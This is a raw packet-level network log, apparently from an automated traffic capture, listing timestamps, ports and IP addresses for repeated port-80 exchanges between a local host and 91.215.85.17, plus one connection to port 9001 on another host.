Dec 24, 2023 10:44:28.737226009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737265110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737282991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737323046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737412930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737449884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737468004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737504959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737524033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737571955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737587929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737605095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737629890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737647057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737725973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737782955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737802982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737842083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737947941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737991095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738009930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738045931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738107920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738152027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738172054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738209963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738229990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738267899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738320112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738358021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738414049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738451004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738470078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738511086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738531113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738575935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738593102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738626957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738641977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738679886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738698006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738713026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738742113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738749981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738776922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738812923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738858938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738909006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.738930941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.738970995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739001989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739047050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739064932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739106894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739124060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739170074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739183903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739223957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739242077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739284039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739299059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739336967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739367008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739403009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739501953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739540100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739602089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739643097 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739694118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739729881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739748955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739787102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.739867926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.739907980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740022898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740072966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740132093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740173101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740226030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740269899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740478992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740519047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740537882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740551949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740566969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740576982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740592003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740607023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740617037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740631104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740644932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740654945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740679979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740705013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740741014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740756035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740789890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740817070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740854025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740870953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740907907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.740936995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.740977049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741009951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741048098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741142035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741179943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741198063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741236925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741308928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741347075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741364956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741403103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741466045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741511106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741555929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741595984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741632938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741671085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741750002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741786003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741813898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741849899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.741928101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.741965055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742017984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742054939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742106915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742144108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742194891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742233992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742300987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742337942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742379904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742418051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742486000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742522001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742577076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742614031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742643118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742679119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742731094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742768049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742788076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742825031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742906094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.742949963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.742969990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743005991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743065119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743114948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743149042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743187904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743247986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743294001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743324041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743364096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743396044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743442059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743495941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743530989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743587017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743622065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743674040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743715048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743733883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743769884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743798971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743834972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.743910074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.743947029 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744002104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744045973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744110107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744148970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744167089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744203091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744240046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744290113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744338036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744381905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744411945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744450092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744479895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744515896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744576931 CET	49720	9001	192.168.2.5	103.253.41.98
Dec 24, 2023 10:44:28.744600058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744642019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744658947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744699001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744771957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744817019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744833946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744870901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.744900942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.744940996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745028019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745107889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745135069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745151043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745218992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745263100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745291948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745337963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745395899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745435953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745470047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745508909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745574951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745614052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745632887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745682001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745699883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745735884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745812893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745857954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.745912075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.745949984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746011019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746049881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746114016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746151924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746215105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746253967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746303082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746342897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746388912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746427059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746479988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746519089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746552944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746593952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746613026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746651888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746726036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746763945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746810913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746850014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746869087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746906996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.746952057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.746989012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747134924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747185946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747205973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747246981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747328043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747364044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747420073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747458935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747509003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747546911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747575045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747613907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747658968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747694016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747746944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747782946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747812986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.747848988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.747994900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748030901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748106003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748142004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748259068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748297930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748352051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748388052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748435020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748471975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748522997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748575926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748621941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748665094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748693943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748760939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748800039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748837948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.748913050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.748950958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749007940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749046087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749074936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749110937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749162912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749201059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749217987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749254942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749281883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749315977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749366999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749407053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749424934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749464035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749480963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749521971 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749540091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749567032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749574900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749605894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749615908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749654055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749671936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749717951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749735117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749780893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749794960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749834061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749845982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749860048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749882936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749897003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749922037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.749963999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.749983072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750009060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750019073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750041008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750071049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750104904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750159025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750197887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750227928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750261068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750273943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750312090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750327110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750368118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750386000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750425100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750442028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750482082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750499964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750514984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750535965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750550985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750633001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750675917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750693083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750742912 CET	49716	80	192.168.2.5	91.215.85.17
